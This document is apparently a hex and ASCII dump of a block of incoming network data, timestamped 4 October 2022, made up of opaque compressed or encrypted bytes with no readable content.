                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25592INData Raw: 49 92 2c 45 25 bf 98 50 e4 2c ac 4d dd f8 ca d7 d9 aa 9b 76 29 cb 98 b5 ca fa f1 e3 73 b6 c3 08 44 01 b9 87 7f b1 f8 f0 4f 1c 8a 2a b4 42 71 03 2b 40 e3 21 6a ce 28 66 9d e1 b5 c8 58 48 c6 0b ae 4d 1a ed 92 11 70 93 8d 3e 7c 8c 48 a0 cd bb b7 d7 c3 02 0c b5 a9 eb 72 4d 6b 4c 54 bb 5f f3 25 98 f3 b3 1d 3d 89 8e 79 40 02 d5 5d d3 86 d7 a2 ba 9c b4 6d 7f f4 d3 4b 7c 69 b2 23 c8 96 a8 27 90 40 9d c2 ef d0 36 67 ed 14 4e f7 ed b0 67 0b 9e 54 5a 38 d2 b8 3b 82 bb be 0e a6 5b fa 5d 84 20 37 54 0e 6c 28 de c2 21 f4 61 cf 92 40 a1 1f a5 36 d1 e4 9c 21 b1 54 23 e4 45 00 12 c6 72 b5 8d bf f5 74 22 8a 8d b7 c7 52 4a 6b d8 8f de 2a bc 50 5b e8 fa 2e a8 ae 98 a3 73 af 7b 0f 5a ab d0 24 43 c5 56 f5 6c 5c 77 d9 c9 64 95 c2 3c 06 33 b0 e5 66 65 33 cb 51 7f 9c 6a 57 37 f0
                                                                                                                                                                                                                                    Data Ascii: I,E%P,Mv)sDO*Bq+@!j(fXHMp>|HrMkLT_%=y@]mK|i#'@6gNgTZ8;[] 7Tl(!a@6!T#Ert"RJk*P[.s{Z$CVl\wd<3fe3QjW7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25608INData Raw: 6a b8 a1 33 8c 21 27 a4 5a ca d5 72 da fc 79 18 8b f0 46 c3 fc e8 55 78 99 ec 55 38 b2 09 58 89 f8 6e 8f 4c 1e ae 63 34 49 a3 42 1c 6e b7 3b ef 83 ce 0f 6f e0 12 59 85 e0 ce 46 f2 30 a8 25 b1 a5 17 50 73 4f 2a b6 e2 df 83 8c 91 74 0b a1 a4 95 3d f1 56 d5 f1 72 3e 82 a1 79 1e 8b dd b4 5f cd 66 b8 48 9d 32 23 9a 57 ab 39 a6 8c 29 f7 8a 2c f9 11 13 79 31 71 d8 c5 06 c4 48 7c 38 46 70 bd 33 82 d7 d3 d0 4f 20 c6 d7 e5 dd f1 37 70 f7 cd 3c 19 d9 b7 f7 f7 d1 53 08 d1 db a1 8c 0f 0d 72 16 bc 7c 09 31 61 ed 2f 89 46 87 1c 73 69 1d 34 63 f4 7e 4c ee 3f ba 54 c0 99 32 0e 1e 30 43 f7 3c 49 90 af 82 bd 58 a9 aa b2 85 80 4e d6 13 a7 f3 a3 6b 74 a2 4a b4 f1 d1 90 c5 2b aa db 40 a3 5b ba a6 0e a5 7c e2 64 cf 51 f2 03 58 49 71 75 d9 f9 96 47 8f 64 e0 06 9c d0 7f 9f 67 e4
                                                                                                                                                                                                                                    Data Ascii: j3!'ZryFUxU8XnLc4IBn;oYF0%PsO*t=Vr>y_fH2#W9),y1qH|8Fp3O 7p<Sr|1a/Fsi4c~L?T20C<IXNktJ+@[|dQXIquGdg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25624INData Raw: 2b 2d 8f c2 43 08 ab d5 a2 45 ac 2c c4 28 42 5a 79 2d b1 19 db 4c 6e 27 a0 6f 89 7f 09 8d 03 28 34 74 22 81 39 d6 ae 41 fa f2 76 d0 31 75 ca 38 83 db 18 d4 1d 56 4d 32 da 5a e4 a5 40 42 a7 3f f8 3f 9b 97 b5 39 2d 09 83 4e 61 e2 f0 49 28 af 34 3f 4b de 15 ae 1b b3 db 7b f3 c5 82 bc 07 5d fe 61 e7 a3 c2 39 05 a7 f9 5b 17 96 18 75 4c 63 ee 92 91 0e 63 49 2b 8f 88 0a c3 47 db f0 d1 4e 3d dc e0 91 b8 58 2d dc bb b9 3d d4 72 12 df 66 28 e9 a4 70 4d 44 c6 ae f4 3a ac b3 c2 3a 89 b4 1a b0 74 7f 0e 44 d2 e5 38 51 c5 9b 72 69 25 89 d6 98 0b 19 19 17 9e ef f8 9f b1 53 c1 51 29 65 46 8f 82 d8 23 70 8d 80 18 af 0a 4b 8d 5c 9f 81 4f 2f 28 8b 90 a1 78 cc 68 c9 70 cc 57 01 3f af 40 ad 94 8e b0 35 39 e1 95 14 70 d3 e7 c6 fc 4a 6a 4b 06 30 b8 02 9d 34 f6 ae 6b bb 71 cd 8e
                                                                                                                                                                                                                                    Data Ascii: +-CE,(BZy-Ln'o(4t"9Av1u8VM2Z@B??9-NaI(4?K{]a9[uLccI+GN=X-=rf(pMD::tD8Qri%SQ)eF#pK\O/(xhpW?@59pJjK04kq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25640INData Raw: 32 e1 92 17 f0 cf 4e 1f 3d 24 87 a0 3e 1a 0d 9e 95 d5 9b 03 f0 c6 a1 27 bb 9f 79 78 7c ad 82 ce a2 23 5a 00 1a 91 7e 3c b9 be 07 72 ea 30 d3 36 ad c9 7b 7b 40 ff 45 8c 6b 83 b1 a4 46 03 9b 74 18 45 8b 4d 19 75 cb 19 3d 67 15 d0 3b d8 7b f8 19 f1 7d 23 20 58 ab b6 ed 1b a9 89 de c3 73 c2 72 ad ba 2e 19 95 63 a1 b9 cf a6 7c 99 1c 68 7f 0b be 40 d3 f0 95 d4 82 c0 5b 2c e9 c5 e4 74 ab b4 ac 8e 91 65 f7 69 a3 67 e7 16 d3 3d 1c 06 20 85 b1 93 a4 4c ca 46 ea 53 08 ef 39 98 9e b7 20 90 ab 78 d9 39 b9 54 47 f9 49 f0 70 d0 e5 fd 52 78 49 27 07 bf 2f fd d2 b1 6d f1 69 07 22 da 94 30 b2 b7 6b 1a 02 bb bb 60 71 c5 6d 1d 01 d1 46 d4 a4 3a d4 b3 f8 53 03 c0 2d ef 17 c5 cf 24 ed f6 b3 04 90 c1 cd 94 e2 ad 55 73 05 64 3e fd 04 ad b4 97 3f 2e 72 60 b6 b2 89 ab a4 17 46 c4
                                                                                                                                                                                                                                    Data Ascii: 2N=$>'yx|#Z~<r06{{@EkFtEMu=g;{}# Xsr.c|h@[,teig= LFS9 x9TGIpRxI'/mi"0k`qmF:S-$Usd>?.r`F
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25656INData Raw: 23 72 2d cd 91 b0 2b 5f ed 6b 37 9c b4 b9 dd 7e 7a b1 e2 7c ae 9e 39 79 ee 55 26 b2 34 8a 80 85 85 f3 7a 83 55 ab bd e8 fd 05 2b a5 fc a9 a6 05 f2 72 2a c4 27 55 d4 ce 52 93 7f 8b 1a 2b e2 da 8c 8f 95 7c 16 48 7e 24 f5 2b c4 4a 48 15 fa 20 36 d0 9d 7f 6a bc b5 ed de ed 25 84 45 ea b1 0c be 15 8e f1 cd fe 04 37 97 06 16 f8 1a 68 93 e2 b4 96 f5 41 39 69 43 2d 62 79 a2 e7 64 a3 ae 69 5d cb eb 7e a3 49 91 f7 69 4c 87 ef 62 15 46 c0 49 6b 8f 98 f0 d5 8c 9d 8a ae 95 dd b6 d2 6a 4f 82 79 17 13 31 73 46 d1 2d 80 61 a6 b9 5c f7 55 94 94 a2 06 96 0f 6b fe ba a5 35 f2 97 c9 dc d7 17 a6 69 26 4c ac 09 85 e5 20 11 7a 7c ca 68 e0 30 2a 9a 05 0a 7a bb f1 61 99 e0 00 f6 74 a1 e8 50 86 50 de 80 e9 a0 9d 4f d1 c6 27 34 64 ca 4a 4f c9 04 dd 40 be 6b 8c d7 2b 7e f6 69 1b a2
                                                                                                                                                                                                                                    Data Ascii: #r-+_k7~z|9yU&4zU+r*'UR+|H~$+JH 6j%E7hA9iC-bydi]~IiLbFIkjOy1sF-a\Uk5i&L z|h0*zatPPO'4dJO@k+~i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25672INData Raw: 82 7d 1f 5b 50 0e 9a 51 30 03 03 1b 90 5b b3 07 15 1e 07 ed b2 f7 8c 55 fd ae 5e 52 13 10 48 7a 83 0e e5 81 8a 96 86 c8 e6 08 80 cd c0 f6 ce 7e 76 92 16 83 31 a9 05 90 5a 73 bb bf 49 e8 7a 1d 03 7a 3b da 40 f3 c3 d1 3b cd 01 6e 5c a4 74 65 0b 09 b3 56 ab 9c ff 98 74 74 16 6e 8d 78 06 8e 49 00 00 ab d0 68 6c a9 c4 0a ca 16 46 1f dd b2 5b 9e 55 0a e2 d6 64 b9 61 12 bb d7 95 2f 86 1f f8 57 bd 05 66 fe dc bd 2e ff 2d 83 75 9f f8 8e 7a d2 b8 86 88 1e 22 0a 74 96 ce f1 10 16 94 27 f5 f3 4a 53 23 b7 c5 68 b8 00 5f ce 3c b1 af 52 6c a1 94 f4 54 51 68 04 17 74 f1 84 ec bc f3 c9 c9 09 6b 4d 3a d0 a2 ac 77 ce 77 4b 17 b5 8d 6e 8c bf c3 f0 87 9b 82 9a ea d5 38 39 e2 ca 63 29 40 14 27 c6 77 72 78 94 10 c9 f5 5e 4c 57 72 fa 10 d8 9f e3 71 e0 5f 0b c8 22 a1 e2 12 35 7a
                                                                                                                                                                                                                                    Data Ascii: }[PQ0[U^RHz~v1ZsIzz;@;n\teVttnxIhlF[Uda/Wf.-uz"t'JS#h_<RlTQhtkM:wwKn89c)@'wrx^LWrq_"5z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25688INData Raw: 0f f9 f7 d8 6e 7c 8e a4 48 82 cc f3 48 4b b0 ef b3 b2 03 52 4c 0d e5 6f 37 35 c2 a5 46 20 68 65 f2 9c ac 6a af 90 95 da ad 53 1a 00 8a 8a 66 b9 9a 15 d4 80 4a 0c c9 b3 aa ca fe 92 7a 77 79 c5 30 a2 99 fb 2b 6d 88 82 39 a5 1a 1b 31 5a 2c 7b a4 d4 75 84 3f 82 63 85 54 7d c0 bd 33 73 4e 9a 9e 2c f1 5e c9 51 45 22 e2 11 34 90 cc b9 eb dc cd 80 cf 53 25 3f 9d 6e e0 d2 52 9d 14 81 2f 61 6d 19 f0 86 f9 e7 4e 59 d0 8d 4d 9d 53 6a 45 10 30 1e 1d 56 ba ec cd ac 26 9d 28 8d b9 0d 25 5d 7b 0c 0a f4 c6 91 a0 57 47 6f 24 9a 0b 38 61 55 7e 87 5b 08 9d 2d 27 75 28 fa 70 89 a0 c1 36 16 c2 87 5b dd f7 66 82 7d df 31 f5 6d e8 1a 5e 81 e7 3a b1 ee b1 2f ec 46 33 33 83 02 c9 fb 64 0f 14 3b 4b c3 78 2c 92 21 08 37 92 60 08 2b 82 a3 e9 5c 3f bd 1e 01 9b 82 f0 f7 5b 2c f7 f5 80
                                                                                                                                                                                                                                    Data Ascii: n|HHKRLo75F hejSfJzwy0+m91Z,{u?cT}3sN,^QE"4S%?nR/amNYMSjE0V&(%]{WGo$8aU~[-'u(p6[f}1m^:/F33d;Kx,!7`+\?[,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25704INData Raw: 1c 7c fa 5c a9 8a c0 51 4d 5e 28 22 61 eb eb 51 52 c9 90 3d 15 8e 79 93 92 19 72 10 19 54 9d ba 2e 9f 2f a2 52 f8 0c 0d b6 80 90 01 fc 3e 61 74 e8 cc 04 80 32 6b 55 b6 0a b0 b4 a1 fe 8c f1 21 de 55 8c ed 66 7a c5 cd a8 a3 21 98 a8 21 95 91 57 a1 df 4f d3 b1 c0 e6 0e f8 fc a9 4a b8 34 9c da 9c 1b 34 24 b8 e2 ba 1d 5f 6f 08 8f 99 c9 6b 22 86 f1 6b 45 95 22 f2 cd 9f aa 2c 84 7a af 7b d1 9e 34 d6 9b ed a4 1f 85 c3 db 72 b7 0a 63 c6 3a 1d 25 3a 1f ca 11 f6 22 25 0f 15 aa 58 51 53 70 df b8 bd 51 46 bf ba 54 a9 de fa 20 1c 0d 2c cd cd e0 97 08 22 0f 18 00 72 3c bc 1b c8 5f 68 47 72 38 7e 7d 8d d1 d6 7d 78 6d a1 d3 f8 64 7e fc 5d 2c 0a b2 3b a5 b2 b8 d3 c8 1e 64 f0 24 cb 46 f4 1b bc be 61 71 74 69 47 06 c6 5d 27 63 a2 23 f3 d3 53 9b 1e dc 4c 20 cd 08 25 68 4b bc
                                                                                                                                                                                                                                    Data Ascii: |\QM^("aQR=yrT./R>at2kU!Ufz!!WOJ44$_ok"kE",z{4rc:%:"%XQSpQFT ,"r<_hGr8~}}xmd~],;d$FaqtiG]'c#SL %hK
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25720INData Raw: 9d f6 d6 9c 00 94 0f db b7 07 f9 40 7b 12 f6 9a 36 ae 59 c2 be 5f a1 28 7c 46 00 59 6c 1a f3 95 fb 38 82 12 1c c6 16 a6 6f a3 be d1 05 cd 10 b1 bc bd b2 ce af 3a 11 fe 70 97 5d d2 e6 0d 69 d1 ae e1 67 33 d1 48 3a 6a bd 93 7c c0 ed d4 14 a8 f9 50 f8 a5 8f 7b a1 b7 47 35 ec a3 fe 67 50 b8 f1 1a c4 f4 45 0f 9e a6 a4 47 d1 cc 11 ea db a2 1b 1b 56 56 c7 f0 87 a4 0c bf ff f9 c5 96 34 82 9b 06 7a f2 36 49 d6 0d af 24 b2 31 fa 21 e2 b6 bd db 0e 9c f6 16 07 e7 ab 3b b8 61 80 da 29 40 d4 97 9a 9d 75 54 66 44 89 35 89 84 28 1b d4 05 71 24 7b 21 6c e3 51 aa 55 5d c4 c8 73 e3 f4 a1 70 d2 76 cb 2c b1 59 98 35 d2 0e e4 1b 7c ba c0 c1 b2 83 5a cf 4d 4a 2b 35 ba 2f 34 b4 ad 8e c2 cb 2a 77 38 17 7d b3 26 53 b1 4d 28 31 4f 09 59 11 ea 0c aa c6 52 fc 9d aa dd 87 01 40 d4 5b
                                                                                                                                                                                                                                    Data Ascii: @{6Y_(|FYl8o:p]ig3H:j|P{G5gPEGVV4z6I$1!;a)@uTfD5(q${!lQU]spv,Y5|ZMJ+5/4*w8}&SM(1OYR@[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25736INData Raw: e3 4c b8 6f 1c 16 1f 70 87 dc fb 44 c2 9b 8d 26 67 5b 4e 68 72 29 70 e0 b7 cc 06 98 dd 8e 5d 56 d5 4d 9c 68 10 22 4b 0e bd c2 c6 46 8f b1 c6 24 53 0e 6e 0a 05 2f ba 60 97 0a ed 78 22 ed 00 01 1e af 45 e0 55 57 a3 ce 65 c5 56 94 53 30 08 e2 63 10 87 4c 81 ce 95 89 69 39 32 f9 07 95 a7 8e e7 f4 c3 a2 47 27 f8 9f 07 57 e1 ec e5 6b d2 e9 89 28 d6 e6 fd d5 d6 eb 55 e5 8f 00 90 e6 02 aa e6 b9 26 a0 f8 c3 4d eb 79 00 61 6f eb 42 17 dc 5a ad 2c 63 11 ee 59 76 1e 71 c0 94 4b 06 f2 e6 37 0d 4f 81 4b 0e 6a c2 d8 8c 07 35 0c b3 41 fc e5 da 9c d5 f5 92 11 4e 6f e6 ab 31 96 fc cf 22 72 c2 ed ba b0 12 a9 b8 58 64 d7 d9 d1 49 61 d4 f8 18 18 ed 05 0f 45 75 1d 47 8c 73 ba 7c b1 b3 a2 91 36 66 02 41 aa 7f 8c 40 83 3e 28 ea 8e 85 f9 e6 42 3c 35 85 d8 21 21 db a5 c5 c8 19 1e
                                                                                                                                                                                                                                    Data Ascii: LopD&g[Nhr)p]VMh"KF$Sn/`x"EUWeVS0cLi92G'Wk(U&MyaoBZ,cYvqK7OKj5ANo1"rXdIaEuGs|6fA@>(B<5!!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25752INData Raw: dd ca e4 72 cf 09 87 04 6b 29 2c 94 15 a7 b8 e2 fa 1a b1 57 71 a3 cf a1 cf 9b 24 08 62 b0 19 45 90 81 67 5d 71 88 cf d5 d3 bd 46 43 d2 f7 a5 c7 60 c1 21 82 a0 73 b2 da 3b 89 0c e2 68 1e 72 47 41 21 b8 29 a0 ce 77 ad 4e 29 37 a2 21 52 34 57 a1 16 cb 75 f0 16 33 e1 10 ce 0c 96 63 5a 1f 09 df da 91 4c bc 7b 18 52 a7 ce 7e f4 5f 1f b4 6a 0b 36 7e c3 24 f9 29 9b 79 6a 42 70 a7 4f 60 6b 5d 18 10 18 ed 06 5d 49 a3 2e 41 7c c3 87 f8 16 0c 83 2a 73 5f 22 5e 68 48 b7 96 49 61 a8 03 d9 a7 99 04 b8 5b 3a 8e 93 bc ee f6 70 fd 49 7c e9 d5 5d e5 83 9a 18 fe 9e a4 75 85 88 68 b1 c3 a9 b0 a8 8e 3c a6 f9 c3 ed 2b 0b e0 29 67 21 74 8c 78 98 d3 48 a9 17 9c 5b 8f 92 43 17 46 14 3e f8 91 a4 c4 96 8f 16 63 72 9b c2 0d 58 c3 57 03 ed b2 fe fe 6f e8 32 de b1 15 ec 10 30 9e 05 65
                                                                                                                                                                                                                                    Data Ascii: rk),Wq$bEg]qFC`!s;hrGA!)wN)7!R4Wu3cZL{R~_j6~$)yjBpO`k]]I.A|*s_"^hHIa[:pI|]uh<+)g!txH[CF>crXWo20e
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25768INData Raw: 2e 26 8d 21 e4 31 ce 26 c4 86 bb 7e b0 5d cd 6c ee 42 2e 9a 2c fa c3 68 3c 74 b5 bf 99 e3 7a a8 c2 3c b3 16 78 05 64 c3 46 1d 68 58 1d a6 4a 23 85 af 53 39 26 a1 60 75 d8 1c 73 80 13 de 93 e8 43 d3 ac 3d 16 fa a1 5b a7 25 d4 14 b8 18 a0 75 c2 09 5b ed c2 97 99 c9 80 17 8f a3 6c 40 88 b6 a9 68 7a b8 29 70 38 ba 79 3e a2 90 73 95 26 71 67 c1 fd bb f5 42 3e 2b 64 91 f3 a2 a4 dd a0 2e df 11 cb e4 0b e9 94 ff e6 a7 35 45 b4 54 16 b6 0d 2d 23 2d b5 62 e6 85 d9 56 35 29 a7 58 4b f3 32 e5 a9 c8 95 1d 39 ae 56 ba 1a 1d c7 74 c1 b0 c9 67 38 9f 7d f3 69 f1 af 44 6d 35 7c e5 52 73 12 69 be f7 7d 31 3f 73 92 f2 43 d9 6b 07 a6 99 08 9f 8b b6 eb 75 f4 e4 04 32 93 6c 08 e0 8c af e0 e4 20 b4 0c db 34 4b de 60 81 88 63 33 79 84 4b 29 e7 92 77 51 e7 b7 30 6d 5e da a3 3d 02
                                                                                                                                                                                                                                    Data Ascii: .&!1&~]lB.,h<tz<xdFhXJ#S9&`usC=[%u[l@hz)p8y>s&qgB>+d.5ET-#-bV5)XK29Vtg8}iDm5|Rsi}1?sCku2l 4K`c3yK)wQ0m^=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25784INData Raw: 5b c1 84 d4 5d 4b 7c 15 b3 6d 4c 2d 9d 58 3d 6f c4 24 05 9e ad 6a f1 55 e4 5b d4 74 d6 4f 1a a6 05 af 59 8f bc 23 d0 37 bc 3a 20 de b6 44 dc eb 7e 79 55 76 59 2c f0 56 b6 cd 8c 0e d6 68 32 a3 c7 9e 07 71 93 eb d8 99 cb 33 6b e6 88 37 49 11 45 5a 17 3d c8 23 3a 17 11 07 10 f2 82 cb 33 ba d0 49 82 62 e3 ee d9 18 5f 2e 84 bf 02 0b 6d c2 3a ab 65 86 aa e8 e0 d2 24 78 40 d1 b4 86 ac d1 99 19 80 3c 48 39 27 52 23 b6 e8 b7 ba ad e3 b4 43 39 ff 56 83 57 5a 15 96 cb be 5c 3f 58 38 7e 5f c3 80 13 2e ef 79 af 94 a7 b1 c9 3a 49 ed 43 36 42 c6 e3 72 c8 1d c9 17 79 78 cc 3c ef 36 00 aa ef 58 d0 01 02 d8 71 ee 06 72 23 01 48 88 11 3a 06 3f ee 69 e4 2e bb ae 95 1a 0d e5 70 1b 85 13 9a 92 1b 48 14 2d 5b f5 f5 52 82 6a dc 7d 71 6a c9 04 0c eb 76 4a fe 54 b5 6f 9a 3f eb 80
                                                                                                                                                                                                                                    Data Ascii: []K|mL-X=o$jU[tOY#7: D~yUvY,Vh2q3k7IEZ=#:3Ib_.m:e$x@<H9'R#C9VWZ\?X8~_.y:IC6Bryx<6Xqr#H:?i.pH-[Rj}qjvJTo?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25800INData Raw: c9 04 4a 13 18 37 af 6e 68 6f 4e cc df 0c 2c df 09 62 22 50 d4 9d 32 e8 53 35 5b 7d 02 7e 09 b0 e3 bf 98 40 c6 a1 72 24 5e a8 ad e5 cf d5 e1 53 33 40 9e 12 34 66 dd df 7e 6f 74 5c a5 b5 7c 7f 5f 3a ea 5a ad 1c 81 42 e0 19 8a 28 bc fe 8b a6 96 00 80 4e 1e 78 16 8c ee c1 d4 f0 26 39 c1 80 8a 2d ee be 79 2a 06 be c4 5f fb f2 91 97 f4 3b 25 4a d9 ff ed 66 a8 cd 7c 8c cd b4 59 2b 70 0b c9 9a 0b 21 c5 d6 4b df 80 ec d7 f8 8f 1d 28 96 d9 20 2b 8a f8 7a bd 7b b1 c3 d9 82 4e b4 f7 c2 6c 2f ad 8e 86 9b 09 32 01 12 53 e1 3d 1d d0 2a f0 e9 15 e4 61 c0 40 cc 6c 8e 5b c5 d6 4d 36 b9 01 8d be a5 84 db e9 9d 3d d6 40 3b cb 43 a9 38 c4 f8 e3 68 dd 18 29 ce 48 f7 2c af 4e 55 0e 54 05 19 c3 74 fe 4f fc 27 a6 95 97 86 bf 71 f8 95 f9 4d 60 2c 3a 86 44 c7 58 eb a7 44 0c e6 b2
                                                                                                                                                                                                                                    Data Ascii: J7nhoN,b"P2S5[}~@r$^S3@4f~ot\|_:ZB(Nx&9-y*_;%Jf|Y+p!K( +z{Nl/2S=*a@l[M6=@;C8h)H,NUTtO'qM`,:DXD
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25816INData Raw: 7a 9b 82 5f 02 9f e2 8e fb a1 65 8b 9a 1d ec 71 54 72 eb 92 d3 e3 43 ad 81 20 f7 e8 1f 3d 15 4c d3 a7 dc 1b 7c f5 c9 5c 76 fe 91 88 79 50 e4 2e bc e7 1d bb b6 7b e7 3e 0a dc 5f 84 5c bb 53 33 3d 6d 0c 56 84 9f 23 30 44 43 b8 88 30 f6 39 00 3e 8d c9 a2 3c 9d 16 0c 5b a4 ac dd 31 db 52 39 c6 31 b4 e1 97 ed 2e 54 23 e8 17 88 2d 3c 8c 81 96 f7 69 c8 f6 87 e8 64 aa ee 2b 80 9d 16 15 34 85 c5 e0 25 53 0d 4f f5 07 b4 e3 d8 cc dd 52 22 2a e6 37 df cf 05 f0 fa cb bc 8c ea 24 2e 8a 2c 01 66 31 0f 5a e9 74 ea 96 1c 45 02 54 59 d7 95 65 09 15 a3 e9 ea b2 f7 e9 37 a8 c6 3a 8a 12 b6 bf ae 4f 9e ba bb d3 8d 4e 32 84 cf ce 61 e4 8b c3 85 bf ba 58 c3 1c 39 0e 25 78 8e e5 ac 02 05 1d 2c de 95 1d 99 ad 8b 9e 86 1d 38 63 b1 ec 50 32 34 68 4c a1 1f 42 e0 8b ce 58 3f c3 a8 a7
                                                                                                                                                                                                                                    Data Ascii: z_eqTrC =L|\vyP.{>_\S3=mV#0DC09><[1R91.T#-<id+4%SOR"*7$.,f1ZtETYe7:ON2aX9%x,8cP24hLBX?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25832INData Raw: 1c 51 b7 b8 45 17 de 1f d4 c4 a6 f2 35 dc e6 7e c0 f7 a3 7b 3d 80 86 dc 05 66 d6 d8 3e 59 ab e9 75 e3 81 b0 4a e3 59 f1 96 71 04 7f 8d eb 4f f5 d5 75 de 4a 2d 7f 3d a8 86 66 21 ff f6 c7 53 4b dc 8b 3c 09 61 6d 88 cd 96 51 9e 8a 2e 85 96 8f 01 50 36 7e 83 84 2e ac ec bc 0d b4 91 31 12 e6 f4 4c 14 15 73 7e 84 6e ae f4 4f 66 d4 c9 23 24 eb 06 6f 51 e5 8b 83 a4 e4 ad 9b b9 6c 46 24 f1 33 8e 91 89 93 12 2c 7d 3c 2e 14 d7 f3 09 34 f8 43 41 5e c2 5d bc 2e 09 06 4e 3b e2 da 7b 47 c7 3d bc 9e b1 c7 70 06 bf 8d aa c1 fa 88 94 7b d4 47 4d 42 ad b2 5e 51 22 5e d4 a1 94 34 c2 21 c9 bd 48 d9 a9 8e 6d ca 53 0b d7 7e 51 6d d4 55 3f 73 9d a6 83 9c 76 9a f4 5a f7 31 c6 fc 16 65 23 cf 62 42 3b f2 77 2f 29 be d0 c5 5b 48 2e 4e c2 f3 ad f3 36 1d d4 69 fc 9a 3e 78 2b eb 2c b6
                                                                                                                                                                                                                                    Data Ascii: QE5~{=f>YuJYqOuJ-=f!SK<amQ.P6~.1Ls~nOf#$oQlF$3,}<.4CA^].N;{G=p{GMB^Q"^4!HmS~QmU?svZ1e#bB;w/)[H.N6i>x+,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25848INData Raw: ec 79 98 a9 16 04 b5 5f 7d 73 80 00 29 d5 c9 d6 aa 17 cf e4 84 6f 69 ea 02 18 68 7f ec b2 22 f1 56 b6 92 55 e7 bc bc fd b2 72 28 e7 c9 fc 7b f9 6a ae 07 19 0c c6 6e 7a e7 0f 5d ef 1a b6 a6 56 1d d2 e9 d3 d8 8e 2d 20 a2 02 ea b8 17 ec 59 1d 7e c2 b0 b2 80 15 8c d4 e7 ba 20 82 cb cd 64 0f 75 6c 1b 75 f7 57 bf 1d a1 d5 39 40 6f 8e eb c7 76 be 57 80 e4 cd e0 ec d2 30 91 65 58 a7 51 86 c0 e1 38 59 cf 2a 6d a6 bb b2 a2 14 0d 74 b3 46 10 29 24 9c a2 07 34 5c 0e 9f bc 82 85 19 41 b0 dd 46 cf fc eb cc 3b ba 40 09 f0 ce fc bc 5f 9b cf c9 b6 47 cf 1e 7f da bd c2 33 8a c9 45 e4 e7 34 28 de 42 c6 7d aa 3a f8 da 65 fa ef e9 6a 66 26 15 1f d4 51 cf 7b b3 ab 46 aa c7 0b 95 63 f3 7b 70 5c 9c a7 c1 af 88 6a 60 63 1c e3 3e 40 df 06 a7 68 96 85 50 2c 71 8f 2f a7 1c 9a 06 34
                                                                                                                                                                                                                                    Data Ascii: y_}s)oih"VUr({jnz]V- Y~ duluW9@ovW0eXQ8Y*mtF)$4\AF;@_G3E4(B}:ejf&Q{Fc{p\j`c>@hP,q/4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25864INData Raw: da 40 56 e9 01 3b 78 9d 44 ab cc b7 5c 5a 7d 35 82 ca 96 fd c9 01 cb f4 a1 45 da 38 db a8 61 33 b4 1d 86 96 cd f5 bc 71 39 a2 ca 43 4b 43 02 8b a1 6b 9c 73 be aa d9 27 9f c9 38 aa 26 26 97 8e 45 17 e6 e7 61 98 f9 a0 5d 82 0c ce 9d a9 75 aa eb 49 83 48 9b e2 07 59 f1 14 ef 43 b5 d3 e7 84 96 bc 3b 60 5d f7 2d 6f b0 3f ce 05 2b 10 27 60 9e b1 47 95 79 e0 90 32 1f 5f f0 6f d1 43 e4 eb e9 d1 f6 81 05 9e e8 dd 1b da 1b 6c d5 ef 08 a0 41 0c db 24 95 72 f8 2b 2a 62 8c f3 d4 c3 82 cb 17 d5 21 38 ac f4 ee 43 34 79 45 8e ef af 71 72 24 b7 5e 33 a9 0d 5e 98 ff ee 59 f5 98 64 51 7b 18 e5 68 af f7 c3 be 7c 0d 6d f9 7f 42 51 c0 fd 52 6b 1c 36 ab 18 53 1c b2 67 ba f9 39 f9 68 5e 8f ee c3 e1 91 9e 44 ec 38 b7 76 39 6f 58 cd 10 b2 fd 5c dd d1 fe d4 bd de c1 71 1b 13 dd de
                                                                                                                                                                                                                                    Data Ascii: @V;xD\Z}5E8a3q9CKCks'8&&Ea]uIHYC;`]-o?+'`Gy2_oClA$r+*b!8C4yEqr$^3^YdQ{h|mBQRk6Sg9h^D8v9oX\q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25880INData Raw: fd 83 86 db ce 60 b6 22 e7 37 c4 20 a5 42 5d 6f cc 1a c7 5e 0d cc 61 2c c4 2b fb 6d 8c a6 a0 1c 30 ff 2c 42 4e fb 1d ec 19 d2 03 0c e9 58 c5 bc b2 a6 bb c7 39 0b d2 88 a7 b8 33 cb d2 1a a3 84 eb 04 8f 60 eb a6 d6 e7 13 f4 1c a7 05 76 93 3c 4b c2 aa 08 c0 27 1e 5b 2a 7d 21 f8 44 9d c4 5a 24 c8 0b e7 aa 0f d7 0e d2 bb a1 c1 3a 02 b3 c6 9b 84 fa 2f 01 8b cd 9e 5a a9 72 fd ce 97 e9 ec 5c de f7 59 30 ef 07 7f ea 67 f4 ab af 0c 0c dc 98 2d 99 51 c6 62 64 13 68 ba 79 84 b9 fc 48 92 3e f8 64 e8 a9 96 06 49 10 bb aa 61 57 01 d2 c9 7c 91 52 e8 7f f5 69 f5 6f 86 a7 26 8f bb 74 bf 3f cc fa 6f 64 ae 6c a9 a1 f5 db 10 5d dd 1b f0 d4 f9 e1 b3 aa 78 1c 10 b6 50 b7 50 04 c0 97 0a ff 55 bc 69 b6 a4 18 ce 95 61 90 fa 1a dc 3e 00 bc 65 50 5e 10 f6 86 7a b1 6e 33 cd a1 28 f7
                                                                                                                                                                                                                                    Data Ascii: `"7 B]o^a,+m0,BNX93`v<K'[*}!DZ$:/Zr\Y0g-QbdhyH>dIaW|Rio&t?odl]xPPUia>eP^zn3(
